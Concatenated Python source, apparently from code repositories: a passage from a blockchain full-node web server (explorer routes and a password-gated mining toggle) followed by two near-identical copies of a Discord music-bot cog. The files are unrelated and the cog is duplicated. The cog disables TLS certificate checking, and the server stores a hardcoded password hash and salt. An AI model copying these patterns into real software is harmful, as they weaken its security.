"coinbase: " + str(transaction.is_coinbase) + ", fees: " + str(transaction.fees) # html += "<tr><th>Transaction " + str(i) + "</th><td>" + str(s) + "</td></tr>" html += "</table>" return str(html) @app.get("/chains") def visualize_chain(): log_ip(request, inspect.stack()[0][3]) data = [] start = BLOCKCHAIN.active_chain.length - 10 if BLOCKCHAIN.active_chain.length > 10 else 0 headers = [] hdr_list = BLOCKCHAIN.active_chain.header_list if len(hdr_list) > 200: hdr_list = BLOCKCHAIN.active_chain.header_list[:100] + BLOCKCHAIN.active_chain.header_list[-100:] for hdr in hdr_list: d = {} d["hash"] = dhash(hdr)[-5:] d["time"] = hdr.timestamp d["data"] = render_block_header(hdr) headers.append(d) data.append(headers) return template("chains.html", data=data, start=start) @app.get("/explorer") def explorer(): log_ip(request, inspect.stack()[0][3]) prev = int(request.query.prev or 0) if prev < 0: prev = 0 hdr_list = list(reversed(BLOCKCHAIN.active_chain.header_list)) indexes = [i for i in range(prev * 8, (prev + 1) * 8) if i < len(hdr_list)] blocks = [Block.from_json(get_block_from_db(dhash(hdr_list[i]))).object() for i in indexes] transactions = list(BLOCKCHAIN.mempool) return template("explorer.html", blocks=blocks, transactions=transactions, prev=prev) @app.route("/block/<blockhash>", name="transaction") def block(blockhash): log_ip(request, inspect.stack()[0][3]) try: block = Block.from_json(get_block_from_db(blockhash)).object() except Exception as e: logger.debug("BLOCK/blockhash: " + str(e)) return template("error.html") return template("block.html", block=block) @app.route("/transaction/<blockhash>/<txhash>", name="transaction") def transaction(blockhash, txhash): log_ip(request, inspect.stack()[0][3]) try: block = Block.from_json(get_block_from_db(blockhash)).object() tx = None for t in block.transactions: if t.hash() == txhash: tx = t except Exception as e: logger.debug("Transaction/bhash/tx: " + str(e)) return template("error.html") return template("transaction.html", tx=tx, block=block) @app.route("/address/<pubkey:re:.+>", name="account") def account(pubkey): log_ip(request, inspect.stack()[0][3]) balance = check_balance(pubkey) tx_hist = BLOCKCHAIN.active_chain.transaction_history.get(pubkey) return template("account.html", tx_hist=tx_hist, balance=balance, pubkey=pubkey) @app.post("/mining") def mining(): log_ip(request, inspect.stack()[0][3]) password = request.body.read().decode("utf-8") hashed = b"\x11`\x1e\xdd\xd1\xb6\x80\x0f\xd4\xb0t\x90\x9b\xd3]\xa0\xcc\x1d\x04$\x8b\xb1\x19J\xaa!T5-\x9eJ\xfcI5\xc0\xbb\xf5\xb1\x9d\xba\xbef@\xa1)\xcf\x9b]c(R\x91\x0e\x9dMM\xb6\x94\xa9\xe2\x94il\x15" dk = hashlib.pbkdf2_hmac("sha512", password.encode("utf-8"), b"forgeteverythingthatyouthinkyouknow", 200000) if hashed == dk: consts.NO_MINING = not consts.NO_MINING logger.info("Mining: " + str(not consts.NO_MINING)) return "Mining Toggled, " + "NOT MINING" if consts.NO_MINING else "MINING" else: return "Password Mismatch," + "NOT MINING" if consts.NO_MINING else "MINING" @app.route("/<url:re:.+>") @error(403) @error(404) @error(505) def error_handle(url="url", error="404"): log_ip(request, inspect.stack()[0][3]) return template("error.html") if __name__ == "__main__": try: if consts.NEW_BLOCKCHAIN: logger.info("FullNode: Starting New Chain from Genesis") BLOCKCHAIN.add_block(genesis_block) else: # Restore Blockchain logger.info("FullNode: Restoring Existing Chain") header_list = read_header_list_from_db() BLOCKCHAIN.build_from_header_list(header_list) # Sync with all my peers sync_with_peers() # Start mining Thread Thread(target=start_mining_thread, daemon=True).start() if consts.NO_MINING: logger.info("FullNode: Not Mining") # Start server if LINE_PROFILING: from wsgi_lineprof.middleware import LineProfilerMiddleware with open("lineprof" + str(consts.MINER_SERVER_PORT) + ".log", "w") as f: app = LineProfilerMiddleware(app, stream=f, async_stream=True) waitress.serve(app, host="0.0.0.0", threads=16, port=consts.MINER_SERVER_PORT) else: waitress.serve(app, host="0.0.0.0", threads=16, port=consts.MINER_SERVER_PORT) except KeyboardInterrupt: miner.stop_mining()
import discord from discord.ext import commands import asyncio import functools import itertools import random import youtube_dl import async_timeout try: import uvloop except ImportError: pass else: asyncio.set_event_loop_policy(uvloop.EventLoopPolicy()) class VoiceError(Exception): pass class YTDLError(Exception): pass class YTDLSource(discord.PCMVolumeTransformer): YTDL_OPTIONS = { "format": "bestaudio/best", "extractaudio": True, "outtmpl": "%(extractor)s-%(id)s-%(title)s.%(ext)s", "restrictfilenames": True, "noplaylist": True, "nocheckcertificate": True, "ignoreerrors": False, "logtostderr": False, "quiet": True, "no_warnings": True, "default_search": "ytsearch", "source_address": "0.0.0.0", } FFMPEG_OPTIONS = { "before_options": "-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5", "options": "-vn", } ytdl = youtube_dl.YoutubeDL(YTDL_OPTIONS) ytdl.cache.remove() def __init__( self, ctx: commands.Context, source: discord.FFmpegPCMAudio, *, data: dict, volume: float = 0.5, ): super().__init__(source, volume) self.requester = ctx.author self.channel = ctx.channel self.data = data self.uploader = data.get("uploader") self.uploader_url = data.get("uploader_url") date = data.get("upload_date") self.upload_date = date[6:8] + "." + date[4:6] + "." + date[0:4] self.title = data.get("title") self.thumbnail = data.get("thumbnail") self.description = data.get("description") self.duration = self.parse_duration(int(data.get("duration"))) self.tags = data.get("tags") self.url = data.get("webpage_url") self.views = data.get("view_count") self.likes = data.get("like_count") self.dislikes = data.get("dislike_count") self.stream_url = data.get("url") def __str__(self): return f"**{self.title}** by **{self.uploader}**" @classmethod async def create_source( cls, ctx: commands.Context, search: str, *, loop: asyncio.BaseEventLoop = None ): loop = loop or asyncio.get_event_loop() partial = functools.partial( cls.ytdl.extract_info, search, download=False, process=False ) data = await loop.run_in_executor(None, partial) if data is None: raise YTDLError("Couldn't find anything that matches `{search}`") if "entries" not in data: process_info = data else: process_info = None for entry in data["entries"]: if entry: process_info = entry break if process_info is None: raise YTDLError(f"Couldn't find anything that matches `{search}`") webpage_url = process_info["webpage_url"] partial = functools.partial(cls.ytdl.extract_info, webpage_url, download=False) processed_info = await loop.run_in_executor(None, partial) if processed_info is None: raise YTDLError(f"Couldn't fetch `{webpage_url}`") if "entries" not in processed_info: info = processed_info else: info = None while info is None: try: info = processed_info["entries"].pop(0) except IndexError: raise YTDLError( f"Couldn't retrieve any matches for `{webpage_url}`" ) return cls( ctx, discord.FFmpegPCMAudio(info["url"], **cls.FFMPEG_OPTIONS), data=info ) @classmethod async def search_source( cls, ctx: commands.Context, search: str, *, loop: asyncio.BaseEventLoop = None ): channel = ctx.channel loop = loop or asyncio.get_event_loop() cls.search_query = f"ytsearch10:{"".join(search)}" partial = functools.partial( cls.ytdl.extract_info, cls.search_query, download=False, process=False ) info = await loop.run_in_executor(None, partial) cls.search = {} cls.search["title"] = f"Search results for:\n**{search}**" cls.search["type"] = "rich" cls.search["color"] = 7506394 cls.search["author"] = { "name": f"{ctx.author.name}", "url": f"{ctx.author.avatar_url}", "icon_url": f"{ctx.author.avatar_url}", } lst = [] VIds = [] for index, e in enumerate(info["entries"]): # lst.append(f'`{info['entries'].index(e) + 1}.` {e.get('title')} **[{YTDLSource.parse_duration(int(e.get('duration')))}]**\n') VId = e.get("id") VUrl = f"https://www.youtube.com/watch?v={VId}" VIds.append(VId) lst.append(f'`{index + 1}.` [{e.get('title')}]({VUrl})\n') lst.append("\n**Type a number to make a choice, Type `cancel` to exit**") cls.search["description"] = "\n".join(lst) em = discord.Embed.from_dict(cls.search) await ctx.send(embed=em, delete_after=45.0) def check(msg): return ( msg.content.isdigit() is True and msg.channel == channel or msg.content.lower() == "cancel" ) try: m = await ctx.bot.wait_for("message", check=check, timeout=45.0) except asyncio.TimeoutError: rtrn = "timeout" else: if m.content.isdigit() is True: sel = int(m.content) if 0 < sel <= 10: if info.get("entries"): VId = VIds[sel - 1] VUrl = f"https://www.youtube.com/watch?v={VId}" partial = functools.partial( cls.ytdl.extract_info, VUrl, download=False ) data = await loop.run_in_executor(None, partial) rtrn = cls( ctx, discord.FFmpegPCMAudio(data["url"], **cls.FFMPEG_OPTIONS), data=data, ) else: rtrn = "sel_invalid" elif m.content.lower() == "cancel": rtrn = "cancel" else: rtrn = "sel_invalid" return rtrn @staticmethod def parse_duration(duration: int): if duration > 0: minutes, seconds = (duration // 60, duration % 60) hours, minutes = (minutes // 60, minutes % 60) days, hours = (hours // 24, hours % 24) duration = [] if days > 0: duration.append(f"{days}") if hours > 0: duration.append(f"{hours}") if minutes > 0: duration.append(f"{minutes}") if seconds >= 0: duration.append(f"{seconds:0>2}") value = ":".join(duration) elif duration == 0: value = "LIVE" return value class Song: __slots__ = ("source", "requester") def __init__(self, source: YTDLSource): self.source = source self.requester = source.requester def create_embed(self): if self.source.duration == "": DURATION = "/" else: DURATION = self.source.duration embed = ( discord.Embed( title="Now playing", description=f"```css\n{self.source.title}\n```", color=discord.Color.blurple(), ) .add_field(name="Duration", value=DURATION) .add_field(name="Requested by", value=self.requester.mention) .add_field( name="Uploader", value=f"[{self.source.uploader}]({self.source.uploader_url})", ) .add_field(name="URL", value=f"[Click]({self.source.url})") .set_thumbnail(url=self.source.thumbnail) .set_author(name=self.requester.name, icon_url=self.requester.avatar_url) ) return embed class SongQueue(asyncio.Queue): def __getitem__(self, item): if isinstance(item, slice): return list(itertools.islice(self._queue, item.start, item.stop, item.step)) return self._queue[item] def __iter__(self): return self._queue.__iter__() def __len__(self): return self.qsize() def clear(self): self._queue.clear() def shuffle(self): random.shuffle(self._queue) def remove(self, index: int): del self._queue[index] class VoiceState: def __init__(self, bot: commands.Bot, ctx: commands.Context): self.bot = bot self._ctx = ctx self.current = None self.voice = None self.next = asyncio.Event() self.songs = SongQueue() self.exists = True self._loop = False self._volume = 0.5 self.skip_votes = set() self.audio_player = bot.loop.create_task(self.audio_player_task()) def __del__(self): self.audio_player.cancel() @property def loop(self): return self._loop @loop.setter def loop(self, value: bool): self._loop = value @property def volume(self): return self._volume @volume.setter def volume(self, value: float): self._volume = value @property def is_playing(self): return self.voice and self.current async def audio_player_task(self): while True: self.next.clear() self.now = None if self.loop is False: # Try to get the next song within 3 minutes. # If no song will be added to the queue in time, # the player will disconnect due to performance # reasons. try: async with async_timeout.timeout(180): # 3 minutes self.current = await self.songs.get() except asyncio.TimeoutError: self.bot.loop.create_task(self.stop()) self.exists = False return self.current.source.volume = self._volume self.voice.play(self.current.source, after=self.play_next_song) await self.current.source.channel.send( embed=self.current.create_embed() ) # If the song is looped elif self.loop is True: self.now = discord.FFmpegPCMAudio( self.current.source.stream_url, **YTDLSource.FFMPEG_OPTIONS ) self.voice.play(self.now, after=self.play_next_song) await self.next.wait() def play_next_song(self, error=None): if error: raise VoiceError(str(error)) self.next.set() def skip(self): self.skip_votes.clear() if self.is_playing: self.voice.stop() async def stop(self): self.songs.clear() if self.voice: await self.voice.disconnect() self.voice = None class music(commands.Cog): """Commands related to music.""" def __init__(self, bot: commands.Bot): self.bot = bot self.voice_states = {} def get_voice_state(self, ctx: commands.Context): state = self.voice_states.get(ctx.guild.id) if not state or not state.exists: state = VoiceState(self.bot, ctx) self.voice_states[ctx.guild.id] = state return state def cog_unload(self): for state in self.voice_states.values(): self.bot.loop.create_task(state.stop()) def cog_check(self, ctx: commands.Context): if not ctx.guild: raise commands.NoPrivateMessage(self.__cog_name__) return True async def cog_before_invoke(self, ctx: commands.Context): ctx.voice_state = self.get_voice_state(ctx) @commands.command(name="join") async def _join(self, ctx: commands.Context): """Joins your current voice channel.""" destination = ctx.author.voice.channel if ctx.voice_state.voice: await ctx.voice_state.voice.move_to(destination) return ctx.voice_state.voice = await destination.connect() @commands.command(name="summon") async def _summon( self, ctx: commands.Context, *, channel: discord.VoiceChannel = None ): """Summons the bot to a voice channel. channel: discord.VoiceChannel The channel to join defaulting to your voice channel. """ if not channel and not ctx.author.voice: raise VoiceError( "You are neither connected to a voice channel nor specified a channel to join." ) destination = channel or ctx.author.voice.channel if ctx.voice_state.voice: await ctx.voice_state.voice.move_to(destination) return ctx.voice_state.voice = await destination.connect() @commands.command(name="leave", aliases=["disconnect"]) async def _leave(self, ctx: commands.Context): """Clears the queue and leaves the voice channel.""" if not ctx.voice_state.voice: return await ctx.send("Not connected to any voice channel.") await ctx.voice_state.stop() del self.voice_states[ctx.guild.id] @commands.command(name="volume") async def _volume(self, ctx: commands.Context, *, volume: int): """Sets the volume of the player. volume: int The volume to be set from 0% to 100%. """ if not ctx.voice_state.is_playing: return await ctx.send("Nothing being played at the moment.") if 0 > volume > 100: return await ctx.send("Volume must be between 0 and 100") ctx.voice_state.current.source.volume = volume / 100 await ctx.send(f"Volume of the player set to {volume}%") @commands.command(name="now", aliases=["current", "playing", "n"]) async def _now(self, ctx: commands.Context): """Displays the currently playing song.""" embed = ctx.voice_state.current.create_embed() await ctx.send(embed=embed) @commands.command(name="pause", aliases=["pa"]) async def _pause(self, ctx: commands.Context): """Pauses the currently playing song.""" if ctx.voice_state.voice.is_playing(): ctx.voice_state.voice.pause() await ctx.message.add_reaction("⏯") @commands.command(name="resume", aliases=["re", "res"]) async def _resume(self, ctx: commands.Context): """Resumes a currently paused song.""" if ctx.voice_state.voice.is_paused(): ctx.voice_state.voice.resume() await ctx.message.add_reaction("⏯") @commands.command(name="stop") async def _stop(self, ctx: commands.Context): """Stops playing song and clears the queue.""" ctx.voice_state.songs.clear() if ctx.voice_state.is_playing: ctx.voice_state.voice.stop() await ctx.message.add_reaction("⏹") @commands.command(name="skip", aliases=["s", "sk"]) async def _skip(self, ctx: commands.Context): """Vote to skip a song.""" if not ctx.voice_state.is_playing: return await ctx.send("Not playing any music right now...") voter = ctx.author if voter == ctx.voice_state.current.requester: await ctx.message.add_reaction("⏭") ctx.voice_state.loop = False ctx.voice_state.skip() elif voter.id not in ctx.voice_state.skip_votes: ctx.voice_state.skip_votes.add(voter.id) total_votes = len(ctx.voice_state.skip_votes) if total_votes >= 1: await ctx.message.add_reaction("⏭") ctx.voice_state.loop = False ctx.voice_state.skip() else: await ctx.send(f"Skip vote added, currently at **{total_votes}/1**") else: await ctx.send("You have already voted to skip this song.") @commands.command(name="queue", aliases=["q"]) async def _queue(self, ctx: commands.Context, *, page: int = 1): """Shows the player's queue. page: int The page to display defaulting to the first page. """ if len(ctx.voice_state.songs) == 0: return await ctx.send("Empty queue.") items_per_page = 10 # -(-3//2) == 2, just gets the ceil pages = -(-len(ctx.voice_state.songs) // items_per_page) start = (page - 1) * items_per_page end = start + items_per_page queue = "" for i, song in enumerate(ctx.voice_state.songs[start:end], start=start): queue += f"`{i + 1}.` [**{song.source.title}**]({song.source.url})\n" embed = discord.Embed( description=f"**{len(ctx.voice_state.songs)} tracks:**\n\n{queue}" ).set_footer(text=f"Viewing page {page}/{pages}") await ctx.send(embed=embed) @commands.command(name="shuffle") async def _shuffle(self, ctx: commands.Context): """Shuffles the queue.""" if len(ctx.voice_state.songs) == 0: return await ctx.send("Empty queue.") ctx.voice_state.songs.shuffle() await ctx.message.add_reaction("✅") @commands.command(name="remove") async def _remove(self, ctx: commands.Context, index: int): """Removes a song from the queue at a given index. index: int The index of the song to remove. """ if len(ctx.voice_state.songs) == 0: return await ctx.send("Empty queue.") ctx.voice_state.songs.remove(index - 1) await ctx.message.add_reaction("✅") @commands.command(name="loop") async def _loop(self, ctx: commands.Context): """Loops the currently playing song.""" if not ctx.voice_state.is_playing: return await ctx.send("Nothing being played at the moment.") ctx.voice_state.loop = not ctx.voice_state.loop await ctx.message.add_reaction("✅") @commands.command(name="play", aliases=["p"]) async def _play(self, ctx: commands.Context, *, search: str): """Plays a song. searcch: str The song to search for. """ async with ctx.typing(): try: source = await YTDLSource.create_source(ctx, search, loop=self.bot.loop) except YTDLError: pass else: if not ctx.voice_state.voice: await ctx.invoke(self._join) song = Song(source) await ctx.voice_state.songs.put(song) await ctx.send(f"Enqueued {source}") @commands.command(name="search") async def _search(self, ctx: commands.Context, *, search: str): """Searches youtube. search: str The song to search youtube for. It returns an imbed of the first 10 results collected from youtube. Then the member can choose one of the titles by typing a number in chat or they can cancel by typing "cancel" in chat. """ async with ctx.typing(): try: source = await YTDLSource.search_source(ctx, search, loop=self.bot.loop) except YTDLError as e: await ctx.send(f"An error occurred while processing this request: {e}") else: if source == "sel_invalid": await ctx.send("Invalid selection") elif source == "cancel": await ctx.send(":white_check_mark:") elif source == "timeout": await ctx.send(":alarm_clock: **Time's up bud**") else: if not ctx.voice_state.voice: await ctx.invoke(self._join) song = Song(source) await ctx.voice_state.songs.put(song) await ctx.send(f"Enqueued {source}") @_join.before_invoke @_play.before_invoke async def ensure_voice_state(self, ctx: commands.Context): if not ctx.author.voice or not ctx.author.voice.channel: raise commands.CommandError("You are not connected to any voice channel.") if ctx.voice_client and ctx.voice_client.channel != ctx.author.voice.channel: raise commands.CommandError("Bot is already in a voice channel.") def setup(bot: commands.Bot) -> None: """Starts music cog.""" bot.add_cog(music(bot))
import discord from discord.ext import commands import asyncio import functools import itertools import random import youtube_dl import async_timeout try: import uvloop except ImportError: pass else: asyncio.set_event_loop_policy(uvloop.EventLoopPolicy()) class VoiceError(Exception): pass class YTDLError(Exception): pass class YTDLSource(discord.PCMVolumeTransformer): YTDL_OPTIONS = { "format": "bestaudio/best", "extractaudio": True, "outtmpl": "%(extractor)s-%(id)s-%(title)s.%(ext)s", "restrictfilenames": True, "noplaylist": True, "nocheckcertificate": True, "ignoreerrors": False, "logtostderr": False, "quiet": True, "no_warnings": True, "default_search": "ytsearch", "source_address": "0.0.0.0", } FFMPEG_OPTIONS = { "before_options": "-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5", "options": "-vn", } ytdl = youtube_dl.YoutubeDL(YTDL_OPTIONS) ytdl.cache.remove() def __init__( self, ctx: commands.Context, source: discord.FFmpegPCMAudio, *, data: dict, volume: float = 0.5, ): super().__init__(source, volume) self.requester = ctx.author self.channel = ctx.channel self.data = data self.uploader = data.get("uploader") self.uploader_url = data.get("uploader_url") date = data.get("upload_date") self.upload_date = date[6:8] + "." + date[4:6] + "." + date[0:4] self.title = data.get("title") self.thumbnail = data.get("thumbnail") self.description = data.get("description") self.duration = self.parse_duration(int(data.get("duration"))) self.tags = data.get("tags") self.url = data.get("webpage_url") self.views = data.get("view_count") self.likes = data.get("like_count") self.dislikes = data.get("dislike_count") self.stream_url = data.get("url") def __str__(self): return f"**{self.title}** by **{self.uploader}**" @classmethod async def create_source( cls, ctx: commands.Context, search: str, *, loop: asyncio.BaseEventLoop = None ): loop = loop or asyncio.get_event_loop() partial = functools.partial( cls.ytdl.extract_info, search, download=False, process=False ) data = await loop.run_in_executor(None, partial) if data is None: raise YTDLError("Couldn't find anything that matches `{search}`") if "entries" not in data: process_info = data else: process_info = None for entry in data["entries"]: if entry: process_info = entry break if process_info is None: raise YTDLError(f"Couldn't find anything that matches `{search}`") webpage_url = process_info["webpage_url"] partial = functools.partial(cls.ytdl.extract_info, webpage_url, download=False) processed_info = await loop.run_in_executor(None, partial) if processed_info is None: raise YTDLError(f"Couldn't fetch `{webpage_url}`") if "entries" not in processed_info: info = processed_info else: info = None while info is None: try: info = processed_info["entries"].pop(0) except IndexError: raise YTDLError( f"Couldn't retrieve any matches for `{webpage_url}`" ) return cls( ctx, discord.FFmpegPCMAudio(info["url"], **cls.FFMPEG_OPTIONS), data=info ) @classmethod async def search_source( cls, ctx: commands.Context, search: str, *, loop: asyncio.BaseEventLoop = None ): channel = ctx.channel loop = loop or asyncio.get_event_loop() cls.search_query = f"ytsearch10:{''.join(search)}" partial = functools.partial( cls.ytdl.extract_info, cls.search_query, download=False, process=False ) info = await loop.run_in_executor(None, partial) cls.search = {} cls.search["title"] = f"Search results for:\n**{search}**" cls.search["type"] = "rich" cls.search["color"] = 7506394 cls.search["author"] = { "name": f"{ctx.author.name}", "url": f"{ctx.author.avatar_url}", "icon_url": f"{ctx.author.avatar_url}", } lst = [] VIds = [] for index, e in enumerate(info["entries"]): # lst.append(f'`{info["entries"].index(e) + 1}.` {e.get("title")} **[{YTDLSource.parse_duration(int(e.get("duration")))}]**\n') VId = e.get("id") VUrl = f"https://www.youtube.com/watch?v={VId}" VIds.append(VId) lst.append(f'`{index + 1}.` [{e.get("title")}]({VUrl})\n') lst.append("\n**Type a number to make a choice, Type `cancel` to exit**") cls.search["description"] = "\n".join(lst) em = discord.Embed.from_dict(cls.search) await ctx.send(embed=em, delete_after=45.0) def check(msg): return ( msg.content.isdigit() is True and msg.channel == channel or msg.content.lower() == "cancel" ) try: m = await ctx.bot.wait_for("message", check=check, timeout=45.0) except asyncio.TimeoutError: rtrn = "timeout" else: if m.content.isdigit() is True: sel = int(m.content) if 0 < sel <= 10: if info.get("entries"): VId = VIds[sel - 1] VUrl = f"https://www.youtube.com/watch?v={VId}" partial = functools.partial( cls.ytdl.extract_info, VUrl, download=False ) data = await loop.run_in_executor(None, partial) rtrn = cls( ctx, discord.FFmpegPCMAudio(data["url"], **cls.FFMPEG_OPTIONS), data=data, ) else: rtrn = "sel_invalid" elif m.content.lower() == "cancel": rtrn = "cancel" else: rtrn = "sel_invalid" return rtrn @staticmethod def parse_duration(duration: int): if duration > 0: minutes, seconds = (duration // 60, duration % 60) hours, minutes = (minutes // 60, minutes % 60) days, hours = (hours // 24, hours % 24) duration = [] if days > 0: duration.append(f"{days}") if hours > 0: duration.append(f"{hours}") if minutes > 0: duration.append(f"{minutes}") if seconds >= 0: duration.append(f"{seconds:0>2}") value = ":".join(duration) elif duration == 0: value = "LIVE" return value class Song: __slots__ = ("source", "requester") def __init__(self, source: YTDLSource): self.source = source self.requester = source.requester def create_embed(self): if self.source.duration == "": DURATION = "/" else: DURATION = self.source.duration embed = ( discord.Embed( title="Now playing", description=f"```css\n{self.source.title}\n```", color=discord.Color.blurple(), ) .add_field(name="Duration", value=DURATION) .add_field(name="Requested by", value=self.requester.mention) .add_field( name="Uploader", value=f"[{self.source.uploader}]({self.source.uploader_url})", ) .add_field(name="URL", value=f"[Click]({self.source.url})") .set_thumbnail(url=self.source.thumbnail) .set_author(name=self.requester.name, icon_url=self.requester.avatar_url) ) return embed class SongQueue(asyncio.Queue): def __getitem__(self, item): if isinstance(item, slice): return list(itertools.islice(self._queue, item.start, item.stop, item.step)) return self._queue[item] def __iter__(self): return self._queue.__iter__() def __len__(self): return self.qsize() def clear(self): self._queue.clear() def shuffle(self): random.shuffle(self._queue) def remove(self, index: int): del self._queue[index] class VoiceState: def __init__(self, bot: commands.Bot, ctx: commands.Context): self.bot = bot self._ctx = ctx self.current = None self.voice = None self.next = asyncio.Event() self.songs = SongQueue() self.exists = True self._loop = False self._volume = 0.5 self.skip_votes = set() self.audio_player = bot.loop.create_task(self.audio_player_task()) def __del__(self): self.audio_player.cancel() @property def loop(self): return self._loop @loop.setter def loop(self, value: bool): self._loop = value @property def volume(self): return self._volume @volume.setter def volume(self, value: float): self._volume = value @property def is_playing(self): return self.voice and self.current async def audio_player_task(self): while True: self.next.clear() self.now = None if self.loop is False: # Try to get the next song within 3 minutes. # If no song will be added to the queue in time, # the player will disconnect due to performance # reasons. try: async with async_timeout.timeout(180): # 3 minutes self.current = await self.songs.get() except asyncio.TimeoutError: self.bot.loop.create_task(self.stop()) self.exists = False return self.current.source.volume = self._volume self.voice.play(self.current.source, after=self.play_next_song) await self.current.source.channel.send( embed=self.current.create_embed() ) # If the song is looped elif self.loop is True: self.now = discord.FFmpegPCMAudio( self.current.source.stream_url, **YTDLSource.FFMPEG_OPTIONS ) self.voice.play(self.now, after=self.play_next_song) await self.next.wait() def play_next_song(self, error=None): if error: raise VoiceError(str(error)) self.next.set() def skip(self): self.skip_votes.clear() if self.is_playing: self.voice.stop() async def stop(self): self.songs.clear() if self.voice: await self.voice.disconnect() self.voice = None class music(commands.Cog): """Commands related to music.""" def __init__(self, bot: commands.Bot): self.bot = bot self.voice_states = {} def get_voice_state(self, ctx: commands.Context): state = self.voice_states.get(ctx.guild.id) if not state or not state.exists: state = VoiceState(self.bot, ctx) self.voice_states[ctx.guild.id] = state return state def cog_unload(self): for state in self.voice_states.values(): self.bot.loop.create_task(state.stop()) def cog_check(self, ctx: commands.Context): if not ctx.guild: raise commands.NoPrivateMessage(self.__cog_name__) return True async def cog_before_invoke(self, ctx: commands.Context): ctx.voice_state = self.get_voice_state(ctx) @commands.command(name="join") async def _join(self, ctx: commands.Context): """Joins your current voice channel.""" destination = ctx.author.voice.channel if ctx.voice_state.voice: await ctx.voice_state.voice.move_to(destination) return ctx.voice_state.voice = await destination.connect() @commands.command(name="summon") async def _summon( self, ctx: commands.Context, *, channel: discord.VoiceChannel = None ): """Summons the bot to a voice channel. channel: discord.VoiceChannel The channel to join defaulting to your voice channel. """ if not channel and not ctx.author.voice: raise VoiceError( "You are neither connected to a voice channel nor specified a channel to join." ) destination = channel or ctx.author.voice.channel if ctx.voice_state.voice: await ctx.voice_state.voice.move_to(destination) return ctx.voice_state.voice = await destination.connect() @commands.command(name="leave", aliases=["disconnect"]) async def _leave(self, ctx: commands.Context): """Clears the queue and leaves the voice channel.""" if not ctx.voice_state.voice: return await ctx.send("Not connected to any voice channel.") await ctx.voice_state.stop() del self.voice_states[ctx.guild.id] @commands.command(name="volume") async def _volume(self, ctx: commands.Context, *, volume: int): """Sets the volume of the player. volume: int The volume to be set from 0% to 100%. """ if not ctx.voice_state.is_playing: return await ctx.send("Nothing being played at the moment.") if 0 > volume > 100: return await ctx.send("Volume must be between 0 and 100") ctx.voice_state.current.source.volume = volume / 100 await ctx.send(f"Volume of the player set to {volume}%") @commands.command(name="now", aliases=["current", "playing", "n"]) async def _now(self, ctx: commands.Context): """Displays the currently playing song.""" embed = ctx.voice_state.current.create_embed() await ctx.send(embed=embed) @commands.command(name="pause", aliases=["pa"]) async def _pause(self, ctx: commands.Context): """Pauses the currently playing song.""" if ctx.voice_state.voice.is_playing(): ctx.voice_state.voice.pause() await ctx.message.add_reaction("⏯") @commands.command(name="resume", aliases=["re", "res"]) async def _resume(self, ctx: commands.Context): """Resumes a currently paused song.""" if ctx.voice_state.voice.is_paused(): ctx.voice_state.voice.resume() await ctx.message.add_reaction("⏯") @commands.command(name="stop") async def _stop(self, ctx: commands.Context): """Stops playing song and clears the queue.""" ctx.voice_state.songs.clear() if ctx.voice_state.is_playing: ctx.voice_state.voice.stop() await ctx.message.add_reaction("⏹") @commands.command(name="skip", aliases=["s", "sk"]) async def _skip(self, ctx: commands.Context): """Vote to skip a song.""" if not ctx.voice_state.is_playing: return await ctx.send("Not playing any music right now...") voter = ctx.author if voter == ctx.voice_state.current.requester: await ctx.message.add_reaction("⏭") ctx.voice_state.loop = False ctx.voice_state.skip() elif voter.id not in ctx.voice_state.skip_votes: ctx.voice_state.skip_votes.add(voter.id) total_votes = len(ctx.voice_state.skip_votes) if total_votes >= 1: await ctx.message.add_reaction("⏭") ctx.voice_state.loop = False ctx.voice_state.skip() else: await ctx.send(f"Skip vote added, currently at **{total_votes}/1**") else: await ctx.send("You have already voted to skip this song.") @commands.command(name="queue", aliases=["q"]) async def _queue(self, ctx: commands.Context, *, page: int = 1): """Shows the player's queue. page: int The page to display defaulting to the first page. """ if len(ctx.voice_state.songs) == 0: return await ctx.send("Empty queue.") items_per_page = 10 # -(-3//2) == 2, just gets the ceil pages = -(-len(ctx.voice_state.songs) // items_per_page) start = (page - 1) * items_per_page end = start + items_per_page queue = "" for i, song in enumerate(ctx.voice_state.songs[start:end], start=start): queue += f"`{i + 1}.` [**{song.source.title}**]({song.source.url})\n" embed = discord.Embed( description=f"**{len(ctx.voice_state.songs)} tracks:**\n\n{queue}" ).set_footer(text=f"Viewing page {page}/{pages}") await ctx.send(embed=embed) @commands.command(name="shuffle") async def _shuffle(self, ctx: commands.Context): """Shuffles the queue.""" if len(ctx.voice_state.songs) == 0: return await ctx.send("Empty queue.") ctx.voice_state.songs.shuffle() await ctx.message.add_reaction("✅") @commands.command(name="remove") async def _remove(self, ctx: commands.Context, index: int): """Removes a song from the queue at a given index. index: int The index of the song to remove. """ if len(ctx.voice_state.songs) == 0: return await ctx.send("Empty queue.") ctx.voice_state.songs.remove(index - 1) await ctx.message.add_reaction("✅") @commands.command(name="loop") async def _loop(self, ctx: commands.Context): """Loops the currently playing song.""" if not ctx.voice_state.is_playing: return await ctx.send("Nothing being played at the moment.") ctx.voice_state.loop = not ctx.voice_state.loop await ctx.message.add_reaction("✅") @commands.command(name="play", aliases=["p"]) async def _play(self, ctx: commands.Context, *, search: str): """Plays a song. searcch: str The song to search for. """ async with ctx.typing(): try: source = await YTDLSource.create_source(ctx, search, loop=self.bot.loop) except YTDLError: pass else: if not ctx.voice_state.voice: await ctx.invoke(self._join) song = Song(source) await ctx.voice_state.songs.put(song) await ctx.send(f"Enqueued {source}") @commands.command(name="search") async def _search(self, ctx: commands.Context, *, search: str): """Searches youtube. search: str The song to search youtube for. It returns an imbed of the first 10 results collected from youtube. Then the member can choose one of the titles by typing a number in chat or they can cancel by typing "cancel" in chat. """ async with ctx.typing(): try: source = await YTDLSource.search_source(ctx, search, loop=self.bot.loop) except YTDLError as e: await ctx.send(f"An error occurred while processing this request: {e}") else: if source == "sel_invalid": await ctx.send("Invalid selection") elif source == "cancel": await ctx.send(":white_check_mark:") elif source == "timeout": await ctx.send(":alarm_clock: **Time's up bud**") else: if not ctx.voice_state.voice: await ctx.invoke(self._join) song = Song(source) await ctx.voice_state.songs.put(song) await ctx.send(f"Enqueued {source}") @_join.before_invoke @_play.before_invoke async def ensure_voice_state(self, ctx: commands.Context): if not ctx.author.voice or not ctx.author.voice.channel: raise commands.CommandError("You are not connected to any voice channel.") if ctx.voice_client and ctx.voice_client.channel != ctx.author.voice.channel: raise commands.CommandError("Bot is already in a voice channel.") def setup(bot: commands.Bot) -> None: """Starts music cog.""" bot.add_cog(music(bot))
